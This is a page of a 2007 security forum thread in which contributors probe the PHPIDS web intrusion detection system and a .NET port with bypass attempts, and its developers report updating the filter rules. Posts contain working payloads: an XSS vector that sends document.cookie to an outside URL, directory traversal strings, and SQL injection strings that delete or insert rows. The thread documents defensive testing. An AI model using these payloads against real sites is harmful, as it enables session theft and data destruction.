Cenzic 232 Patent
Paid Advertising
sla.ckers.org is
ha.ckers sla.cking
Sla.ckers.org
Whether this is about ha.ckers.org, sla.ckers.org or some other project you are interested in or want to talk about, throw it in here to get feedback. 
Go to Topic: PreviousNext
Go to: Forum ListMessage ListNew TopicSearchLog In
Pages: Previous1234567891011...LastNext
Current Page: 4 of 31
Re: WebApp IDS
Posted by: Anonymous User
Date: May 13, 2007 06:29AM

Yeah I tryed that one out also typing around my ASCII pad ^^, but if you mix it with nulls or > < it will. I guess they allow such chars because of locales cause every language should be able to use this thing.

Options: ReplyQuote
Re: WebApp IDS
Posted by: Anonymous User
Date: May 13, 2007 09:39AM

@Ronald & Hong: Yes - exactly. But - do you see any problems in not detection vwe? I don't yet but maybe i miss the forest for the trees.

Thanks!
.mario

Options: ReplyQuote
Re: WebApp IDS
Posted by: Martin
Date: May 21, 2007 04:22PM

http://phpids.heideri.ch/?test=test1%20/%3Etest%3Ca%3E%20I%20have%20escaped!%20%3Ca%20href=%22backin%22

I don't know if this counts or not - it escapes the a href no quotes - which is definitely malicious input although not of a high severity.

http://www.the-mice.co.uk/switch/ Switch/Twitch
http://code.google.com/p/dotnetids .NETIDS

Options: ReplyQuote
Re: WebApp IDS
Posted by: Anonymous User
Date: May 23, 2007 06:58AM

@Martin: Thanks a lot! Modified the rules...

http://phpids.heideri.ch/?test=test1%20/%3Etest%3Ca%3E%20I%20have%20escaped!%20%3Ca%20href=%22backin%22

Greetings,
.mario

Options: ReplyQuote
Re: WebApp IDS
Posted by: Martin
Date: May 23, 2007 03:23PM

@.mario - it's still escapable via http://phpids.heideri.ch/?test=%3Etest%3C/a%3E%20ESCAPED%20AGAIN!!!!

I'm not sure how this can be detected really, unless you disallow >, but this is essentially allowing a malicious individual to write their content onto the page - ie. could forge a link to "login".

http://www.the-mice.co.uk/switch/ Switch/Twitch
http://code.google.com/p/dotnetids .NETIDS

Options: ReplyQuote
Re: WebApp IDS
Posted by: Anonymous User
Date: May 24, 2007 02:21AM

@Martin: Well - I think it would create tons of false positives to detect the single occurence of the greater-than-character - also you can just escape when the surrounding HTML is really bad . Furhtermore you could inject anything active/executable without being noticed so i guess it makes sense to just leave the filter as it is in this case.

Maybe it would make sense to detect character sequences like >[\s\w]</\w> - so you could make sure it it really an attempt to close an open tag/escape an attribute.

What do you think?



Edited 1 time(s). Last edit at 05/24/2007 09:57AM by .mario.

Options: ReplyQuote
Re: WebApp IDS
Posted by: Martin
Date: May 24, 2007 04:12AM

@.mario - firstly, I apologise for those !!!!s after the URL - they were meant to be part of it hehe.

I agree that catching > will generate too many false positives. Maybe this is one that will just have to be let go - I mean you can write a new attribute simply by putting a space after some text in the a href no quotes.

http://www.the-mice.co.uk/switch/ Switch/Twitch
http://code.google.com/p/dotnetids .NETIDS

Options: ReplyQuote
Re: WebApp IDS
Posted by: Anonymous User
Date: May 24, 2007 10:00AM

@Martin - no problem - I can live with the !!!s ;)

Let's conclude that good protection can only result of a minimum of code quality - which is definitely not given with pseudo HTML lacking attribute delimiters etc. - and as mentioned even if someone would manage to break out undetected the code afterwards would be detected for sure.

Thanks for your input!

Greetings,
.mario

Options: ReplyQuote
Re: WebApp IDS
Posted by: Anonymous User
Date: May 24, 2007 10:56AM

Hi!

@Martin: I think I found a way to filter the above mentioned input without creating too much false alerts.

@all: I just updated the filter rules and the smoke test - now the PHP IDS should be capable to detect all possible fullwidth/halfwidth encoding attacks - also I improved the performance of the regex rules and changed some minor details with the impact of some rules (SQLi detection got a 5, detection of attributes in closed tags got a three)

We are straight heading towards the first public release - currently I am working in our intranet structure together with some group members and try to create a page design including logo etc.

We'll soon have the beta of the PHP IDS running on three high traffic platforms (formerly one) and expect another increase of quality due to the information we'll hopefully get.

I'll keep you informed about the state of the IDS - thank for all the testing and the input!
(and please keep testing like hell *g* )

Greetings!
.mario


<edit> next post is no. 100 in this thread - go get it! ;) </edit>



Edited 1 time(s). Last edit at 05/24/2007 10:57AM by .mario.

Options: ReplyQuote
Re: WebApp IDS
Posted by: thrill
Date: May 24, 2007 12:03PM

100th post!

j/k..

@.mario - I haven't had a chance to take a look at the updated instructions. Been busy at work. But I'm hoping this weekend will give me a chance to put the ids on the beta site I set up. If all goes well there, I'll deploy it on other sites I have, including http://www.createasmilefoundation.org which already has over 36000 hits, so it'd be a nice site to test it's sturdyness.

--thrill

---

It is not the degrees you hold, but the mind you possess. - thrill

Options: ReplyQuote
Re: WebApp IDS
Posted by: Martin
Date: May 24, 2007 02:35PM

What about detecting directory traversals (../) which could be useful when trying to avoid LFI vulnerabilities?

http://www.the-mice.co.uk/switch/ Switch/Twitch
http://code.google.com/p/dotnetids .NETIDS

Options: ReplyQuote
Re: WebApp IDS
Posted by: Anonymous User
Date: May 24, 2007 03:10PM

@thrill: Congrats for the 100th post! ;) Regrading your applications: Nice! I am looking forward for that - if you need support just drop me or christ1an a line via PM/mail or the google group - I should be online whole weekend although not that frequently 'cause I'm gonna visit my family.

@Martin: A basic check for DT is already included - give it a try!

Greetings!
.mario

Options: ReplyQuote
Re: WebApp IDS
Posted by: Martin
Date: May 24, 2007 03:51PM

@.mario - I tried http://phpids.heideri.ch/?test=/../thisfile and it triggered no warnings that this was dangerous input... is that what you meant?

http://www.the-mice.co.uk/switch/ Switch/Twitch
http://code.google.com/p/dotnetids .NETIDS

Options: ReplyQuote
Re: WebApp IDS
Posted by: Anonymous User
Date: May 24, 2007 04:20PM

@Martin: Yes

http://phpids.heideri.ch/?test=/../../thisfile

That works and worked - your's will work tomorrow ;)
Thanx!

Options: ReplyQuote
Re: WebApp IDS
Posted by: beford
Date: May 24, 2007 04:29PM

http://phpids.heideri.ch/?test=\..\..\..\thisfile

Options: ReplyQuote
Re: WebApp IDS
Posted by: Anonymous User
Date: May 24, 2007 05:00PM

Phew - couldn't get my hands off. Now even obfuscated directory traversal (using unicode, hex-entities, etc.) should be detected.

Good n8!
.mario

p.s. @bedford: damn - i forgot windows ;)



Edited 1 time(s). Last edit at 05/24/2007 05:01PM by .mario.

Options: ReplyQuote
Re: WebApp IDS
Posted by: beford
Date: May 25, 2007 01:44AM

hxxp://phpids.heideri.ch/?test=%23%22+onclick%60=%22window.location='ht'%2b'tp://google.com/?'%2bdocument.cookie

Affects
Firefox 2.x < 2.0.0.2
Firefox 1.5x < 1.5.10

:P

Options: ReplyQuote
Re: WebApp IDS
Posted by: Anonymous User
Date: May 25, 2007 03:31AM

@beford: wow - impressive. thx!

FIXED

Options: ReplyQuote
Re: WebApp IDS
Posted by: Martin
Date: May 25, 2007 03:55PM

I've done the initial work on a port to .NET (c#). Work is at http://code.google.com/p/dotnetids/

Missing:

Complete XMLDOC comments
Some IEnumerable implementations

Still, it works, here's a test page using it:

IDS.IDS ids = new IDS.IDS(Request.QueryString);
ids.Run();

Label1.Text = "Total Impact: " + ids.Report.Impact.ToString();

foreach (IDS.Event ev in ids.Report.Events)
{
Label2.Text = "Param " + ev.Name + " failed " + ev.Filters.Count + " filters:<br/><br/>";

foreach (Filter f in ev.Filters)
{
Label2.Text += "Filter: " + f.Description + "<br/>";
Label2.Text += "Rule: " + Server.HtmlEncode(f.Rule) + "<br/>";
Label2.Text += "Impact: " + f.Impact.ToString() + "<br/><br/>";
}

}

I'm away for the next week but will do some more on it when I'm back - and after celebrating my birthday - which is tomorrow!

Have fun all!

http://www.the-mice.co.uk/switch/ Switch/Twitch
http://code.google.com/p/dotnetids .NETIDS

Options: ReplyQuote
Re: WebApp IDS
Posted by: kishord
Date: May 28, 2007 06:44AM

beford's vector is still not fixed

hxxp://phpids.heideri.ch/?test=%23%22+onclick%60=%22location='ht'%2b'tp://google.com/?'%2bdocument.cookie

onWAHTEVER.=
may be a better way to go.

Options: ReplyQuote
Re: WebApp IDS
Posted by: kishord
Date: May 28, 2007 07:58AM

There should not be only a . after
onWAHTEVER (xxtp://phpids.heideri.ch/?test=%23%22+onclick%60=%22location='ht'%2b'tp://google.com/?'%2bdocument.cookie
also works)

I guess we will need to enumerate all such characters that work.

Do u know the list beford?

Web Application Security Journ(ey)al

Options: ReplyQuote
Re: WebApp IDS
Posted by: beford
Date: May 29, 2007 03:03AM

http://www.mozilla.org/security/announce/2007/mfsa2007-02.html
http://ha.ckers.org/xss.html#XSS_Non_alpha_non_digit2

You probably want to filter out document.location, top.location, self.location



Edited 1 time(s). Last edit at 05/29/2007 03:04AM by beford.

Options: ReplyQuote
Re: WebApp IDS
Posted by: Anonymous User
Date: May 29, 2007 04:48AM

Hi!

Thanks guys - FIXED!

http://phpids.heideri.ch/?test=%23%22+onclick%60=%22location='ht'%2b'tp://google.com/?'%2bdocument.cookie

I will lock myself in the next days and optimize the SQL injection detection - there's still plenty of work to do...

Greetings,
.mario

Options: ReplyQuote
Re: WebApp IDS
Posted by: christ1an
Date: May 31, 2007 01:29PM

We have enhanced the SQL Injection detection vectors again. I would appreciate if anyone would try to inject malicious code.

http://phpids.heideri.ch/?test=xxx

Thanks!

Regards,
- http://christ1an.blogspot.com

_______________________
[[url=http://php-ids.org]php-ids.org[/url]] Web Application Security 2.0

Options: ReplyQuote
Re: WebApp IDS
Posted by: Anonymous User
Date: June 03, 2007 09:48PM

This will pass: 1 AND(DELETE FROM LOGIN)

Integer SQL injection, which deletes table, or inserts.

is exploitable like this:

# weak query int SQL injection.
$sql = "SELECT * FROM LOGIN WHERE id = $_POST['id'] ";

# exploit result
$sql = "SELECT * FROM LOGIN WHERE id = 1 AND(DELETE FROM LOGIN) "; // pow!

Options: ReplyQuote
Re: WebApp IDS
Posted by: Anonymous User
Date: June 03, 2007 09:56PM

And a few theoretical ones:

1' \x0 AND(INSERT INTO LOGIN SET USER = CONCAT(CHAR(39),CHAR(07),CHAR(39)) '

1' \x0 AND(INSERT INTO LOGIN SET USER = 0x00000 )

Options: ReplyQuote
Re: WebApp IDS
Posted by: Anonymous User
Date: June 04, 2007 04:57AM

Hi Ronald!

Thanks a lot - I will update the filter ASAP...

<edit>
FIXED
...and btw - the URL for the smoketest finally changed
http://demo.phpids.org/?test=1'%20\x0%20AND(INSERT%20INTO%20LOGIN%20SET%20USER%20=%200x00000%20)
</edit>

Grx,
.mario



Edited 2 time(s). Last edit at 06/04/2007 05:14AM by .mario.

Options: ReplyQuote
Re: WebApp IDS
Posted by: [k]
Date: June 13, 2007 02:37AM

I'm very keen to test this - while you tackle your server issues, is there (or would you like) a mirror?

Options: ReplyQuote
Re: WebApp IDS
Posted by: Anonymous User
Date: June 13, 2007 03:24AM

Hi!

We're back - Trac and forum are still down but you can use page and downloads again. I guess by tomorrow the whole estate should be working again.

http://php-ids.org/

Thanks for your support!
.mario

Options: ReplyQuote
Re: WebApp IDS
Posted by: Martin
Date: June 15, 2007 09:06AM

Just a quick note about .NETIDS which I really want to share!

There is now support on the SmokeTest for detection of fragmented XSS attacks!

I posted full details at http://the-mice.co.uk/switch/index.php/archives/27

but a basic example can be found at:

http://www.the-mice.co.uk/SmokeTest/SmokeTest.aspx?param1=Hello%20&param2=this%20&param3=is%20a%20test!
and
http://www.the-mice.co.uk/SmokeTest/SmokeTest.aspx?param1=%3C&param2=script&param3=%3E

Please try and stress this feature and let me know if you break it!

Thanks,

Martin

http://www.the-mice.co.uk/switch/ Switch/Twitch
http://code.google.com/p/dotnetids .NETIDS

Options: ReplyQuote
Pages: Previous1234567891011...LastNext
Current Page: 4 of 31


Sorry, only registered users may post in this forum.